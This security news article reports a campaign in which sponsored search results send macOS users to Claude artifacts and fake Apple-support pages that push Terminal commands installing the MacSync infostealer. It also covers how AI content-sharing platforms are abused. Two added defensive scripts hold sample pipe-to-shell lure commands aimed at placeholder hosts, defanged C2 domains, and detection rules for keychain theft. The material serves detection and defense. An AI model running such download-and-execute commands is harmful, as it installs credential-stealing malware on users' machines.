The combined AI-and-ads scam that steals data on macOS

Published · 5 min read · 133 reads

In recent weeks, a campaign has been detected that combines two very current vectors: sponsored search-engine results and public content generated by language models. The attackers managed to place ads on Google that point to guides hosted on Claude or to pages that imitate Apple technical support, with the aim of getting macOS users to run Terminal commands that install an infostealer known as MacSync.

A Claude "artifact" is simply an output of the model (instructions, code fragments or guides) that its author publishes as a public resource reachable through a link on the claude.ai domain. These pages carry a notice that the content was generated by a user and has not been verified, but that did not stop malicious actors from using it as a vector to deceive people looking for specific technical solutions.

Image generated with AI.

Researchers at MacPaw's research laboratory, Moonlock Lab, and analysts at the ad-blocking company AdGuard identified the manipulated results linked to searches such as "resolve DNS online," "macOS CLI disk space analyzer" and "HomeBrew." The malicious links lead either to a public artifact on Claude or to a Medium article that impersonates Apple support; in both cases the goal is the same: to convince the user to paste a command into Terminal and press Enter.

At least two variants of the lure have been observed. One instructs the victim to run a chain that decodes a base64 blob and pipes it directly into zsh; the other encourages the use of a curl command that downloads a script from an attacker-controlled URL and runs it with zsh. To avoid spreading live domains, the researchers publish these addresses with the dots replaced (e.g. raxelpak[.]com and a2abotnet[.]com). Running either command downloads a loader that deploys the MacSync infostealer.
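The two lure shapes just described have a recognisable structure, and a user or help-desk can check a copied one-liner for that structure before it is ever pasted. The inspector below is an added example written for this article; it is not code from the article, from Moonlock Lab or from AdGuard. It flags a download piped straight into a shell and a base64 stage decoded into a shell, expands the base64 stage so the hidden command becomes visible, and reports any hostnames it finds defanged (dots replaced by "[.]") so the result can be shared without creating clickable links. The sample commands and the .invalid hostnames in it are constructed placeholders, not indicators from the campaign.

```python
"""Pre-paste inspector for shell one-liners (added example, not from the
original article, Moonlock Lab or AdGuard).

It flags the two lure shapes the article describes: a base64 blob decoded
and piped straight into zsh, and a curl download piped into zsh.  Hostnames
are reported defanged so a report can be shared safely.  Every sample
command below is constructed; the .invalid hostnames are placeholders.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field

SHELLS = r"(?:zsh|bash|sh|ksh)"
# "curl ... | zsh" (also catches "wget -O- ... | sh")
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?" + SHELLS + r"\b")
# "... | base64 -d | zsh"; macOS base64 spells the flag -D or --decode
B64_TO_SHELL = re.compile(
    r"base64\s+(?:-d|-D|--decode)\b[^|;&]*\|\s*(?:sudo\s+)?" + SHELLS + r"\b")
# a long base64-looking token handed to echo/printf
B64_BLOB = re.compile(r"(?:echo|printf)\s+['\"]?([A-Za-z0-9+/=]{20,})['\"]?")
HOSTNAME = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})")


def defang(host: str) -> str:
    """'example.invalid' -> 'example[.]invalid' (safe to paste into a report)."""
    return host.replace(".", "[.]")


@dataclass
class Verdict:
    risky: bool
    reasons: list = field(default_factory=list)
    hosts: list = field(default_factory=list)   # defanged hostnames
    decoded: str = ""                           # what a base64 stage expands to


def inspect_command(cmd: str) -> Verdict:
    """Return a Verdict for one command line as it would be pasted."""
    v = Verdict(risky=False)
    if PIPE_TO_SHELL.search(cmd):
        v.risky = True
        v.reasons.append("remote download piped directly into a shell")
    if B64_TO_SHELL.search(cmd):
        v.risky = True
        v.reasons.append("base64 payload decoded and piped into a shell")
    m = B64_BLOB.search(cmd)
    if m:
        try:  # expand the hidden stage so the user can read it
            v.decoded = base64.b64decode(m.group(1), validate=True).decode(
                "utf-8", "replace")
        except (binascii.Error, ValueError):
            v.decoded = ""
    # collect hostnames from the visible command and from the decoded stage
    for h in HOSTNAME.findall(cmd + "\n" + v.decoded):
        d = defang(h)
        if d not in v.hosts:
            v.hosts.append(d)
    if v.decoded and HOSTNAME.search(v.decoded):
        v.risky = True
        v.reasons.append("hidden stage contacts a remote host")
    return v


# Constructed samples (placeholders, not real indicators)
SAMPLE_SAFE = "du -sh ~/Library/Caches | sort -h"
SAMPLE_CURL_LURE = "curl -fsSL https://updates.example.invalid/fix.sh | zsh"
_HIDDEN = "curl -s https://stage2.example.invalid/p | zsh"
SAMPLE_B64_LURE = "echo %s | base64 -d | zsh" % base64.b64encode(
    _HIDDEN.encode()).decode()

if __name__ == "__main__":
    for c in (SAMPLE_SAFE, SAMPLE_CURL_LURE, SAMPLE_B64_LURE):
        r = inspect_command(c)
        print("RISKY" if r.risky else "ok   ", c)
        for reason in r.reasons:
            print("   -", reason)
        if r.hosts:
            print("   hosts:", ", ".join(r.hosts))
        if r.decoded:
            print("   hidden stage:", r.decoded)
```

The decoded stage is printed rather than executed, which is the whole point: the check shows what the blob would have run. A clean verdict does not make a command safe, only one that is not wearing the shapes described in the article, so the advice to have the command explained and to consult official documentation still applies.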

According to the technical analysis published by the researchers, the malware communicates with its command-and-control infrastructure using credentials embedded in the code itself, spoofs the user agent of a macOS browser so that its traffic looks legitimate and, most dangerously, uses osascript (AppleScript) to access and extract sensitive data: keychain items, credentials saved in browsers and cryptocurrency wallets. The collected information is packed into a temporary file (e.g. /tmp/osalogging.zip) and sent to the attacker's server via HTTP POST requests; if the upload fails, the file is split into fragments and retried several times before the malware cleans up its traces.

The scope is worrying: Moonlock Lab reported that the malicious guide published on Claude accumulated tens of thousands of visits (the researchers cited figures above 15,000 views), and AdGuard had detected the same publication with more than 12,000 visits a few days earlier. These figures give an idea of how many people may have been exposed to the lure. Moonlock Lab shared its findings publicly on X, which makes it possible to review the exchange of alerts and technical evidence in context: Moonlock Lab thread. Specialist media have also provided coverage documenting the technique and the tooling used.

This type of campaign is not an isolated development: attackers have already been documented using shared conversations from other major models such as ChatGPT or Grok to distribute infostealers (e.g. the AMOS family). What this case shows is that the abuse is spreading to other LLM platforms and that combining paid search results with public AI content can increase the visibility of the lures.

In view of this, very specific precautions should be taken. Don't paste Terminal commands you don't fully understand, and distrust pages that ask you to run "quick" recipes by copying and pasting. If you found the command in a chatbot's output or in an online guide, a good practice is to ask, in the same conversation, for the model itself to explain step by step and in detail what that command does and what risks it carries; security teams such as Kaspersky have recommended exactly that check as an initial filter against so-called "pastejacking" or malicious guides. For security queries on macOS, also check the official Apple documentation and recognized security sources before running instructions.

Image generated with AI.

Beyond user caution, there are measures that help mitigate the risk on the device: keep macOS up to date, enable system protections such as Gatekeeper and notarization, use endpoint security solutions, and review application permissions and keychain access. For administrators and security teams, it is worth monitoring suspicious outbound traffic and blocking known C2 domains, as well as working with ad networks and advertising platforms to curb the appearance of ads that point to malicious content.
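The behaviours described in the technical analysis above (a spoofed browser user agent on non-browser traffic, osascript reaching into credential stores, a staging archive under /tmp, and POSTs to the published C2 domains) translate directly into the monitoring the last paragraph recommends. The script below is an added example of that triage; it is not code from the article, Moonlock Lab or AdGuard. It refangs the defanged domains from the article into a blocklist and runs four rules over endpoint events. The JSON-lines log format, the field names and every event in the sample log are constructed for this example; the osascript rule (a shell-spawned osascript whose command line mentions keychain or browser credential paths) is an assumed heuristic, not a published detection. Only the two defanged domains and the /tmp/osalogging.zip path come from the article.

```python
"""Endpoint log triage for the indicators described in the article (added
example; not code from the original article, Moonlock Lab or AdGuard).

Rules:
  c2_blocklist     outbound request to a domain on the (refanged) IoC list
  fake_browser_ua  a non-browser process sending a browser User-Agent
  staging_archive  an archive created under /tmp named osalogging.zip
  osascript_creds  osascript started from a shell, command line touching
                   keychain or browser credential stores (assumed heuristic)

The JSON-lines log format, its field names and all sample events are
constructed; only the two domains and the /tmp path come from the article.
"""
import json
import re

DEFANGED_IOCS = ["raxelpak[.]com", "a2abotnet[.]com"]  # as published, defanged
BROWSER_PROCS = {"Safari", "Google Chrome", "firefox", "Brave Browser"}
STAGING_NAME = re.compile(r"^/(?:private/)?tmp/osalogging\.zip$")
# assumed heuristic: macOS keychain directory and Chromium's password DB name
CRED_PATHS = re.compile(r"Library/Keychains|Login Data", re.IGNORECASE)


def refang(ioc: str) -> str:
    """'raxelpak[.]com' -> 'raxelpak.com' so it can be matched against logs."""
    return ioc.replace("[.]", ".").replace("(.)", ".").replace("[dot]", ".")


BLOCKLIST = {refang(d).lower() for d in DEFANGED_IOCS}


def on_blocklist(host: str) -> bool:
    """True for a listed domain or any subdomain of it."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BLOCKLIST)


def check_event(ev: dict) -> list:
    """Return the names of every rule one event trips."""
    hits = []
    kind = ev.get("kind")
    proc = ev.get("proc", "")
    if kind == "net":
        if on_blocklist(ev.get("host", "")):
            hits.append("c2_blocklist")
        ua = ev.get("user_agent", "")
        if proc not in BROWSER_PROCS and ("Mozilla/" in ua or "Safari/" in ua):
            hits.append("fake_browser_ua")
    elif kind == "file" and ev.get("op") == "create":
        if STAGING_NAME.match(ev.get("path", "")):
            hits.append("staging_archive")
    elif kind == "proc" and proc == "osascript":
        if ev.get("parent") in {"zsh", "bash", "sh"} and CRED_PATHS.search(
                ev.get("cmdline", "")):
            hits.append("osascript_creds")
    return hits


def scan_logs(lines) -> list:
    """Return (timestamp, rule) pairs; malformed lines are skipped, not fatal."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        for rule in check_event(ev):
            alerts.append((ev.get("ts", "?"), rule))
    return alerts


# Constructed sample log: one benign browser request, then the sequence the
# article describes (credential access, staging archive, exfil POST), plus a
# garbage line to show the parser tolerates it.
SAMPLE_LOG = r"""
{"ts":"T1","kind":"net","proc":"Safari","host":"www.apple.com","method":"GET","user_agent":"Mozilla/5.0 (Macintosh) Safari/605.1"}
{"ts":"T2","kind":"proc","proc":"osascript","parent":"zsh","cmdline":"osascript -e 'do shell script \"ls ~/Library/Keychains\"'"}
{"ts":"T3","kind":"file","proc":"zsh","op":"create","path":"/tmp/osalogging.zip"}
{"ts":"T4","kind":"net","proc":"curl","host":"raxelpak.com","method":"POST","user_agent":"Mozilla/5.0 (Macintosh) Safari/605.1"}
not json at all
"""

if __name__ == "__main__":
    for ts, rule in scan_logs(SAMPLE_LOG.splitlines()):
        print(ts, rule)
```

The blocklist rule is the only one tied to this campaign's infrastructure; the other three describe behaviour (a curl process claiming to be Safari, a shell-launched osascript near credential stores, an archive appearing in /tmp) and will keep firing after the domains rotate, which is why the article's advice to watch outbound traffic rather than only a domain list matters.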

Finally, this incident raises a broader question: platforms that allow model outputs to be shared, and ad networks, must improve their verification mechanisms so that generated or promoted content cannot be used as an infection vector. As those protections evolve, the best defense will continue to be the combination of user awareness, good basic security practice and the use of reliable sources before learning or executing any technical instruction.

For those who want to dig into the original reports, the technical coverage and analysis published by the media and teams that investigated the campaign are available: the Moonlock Lab report and the notes from security and ad-blocking companies. Besides Claude's own platform (claude.ai), see the publications of MacPaw / Moonlock Lab, the security section of BleepingComputer and the AdGuard blog to put the findings in context and follow the mitigation recommendations.
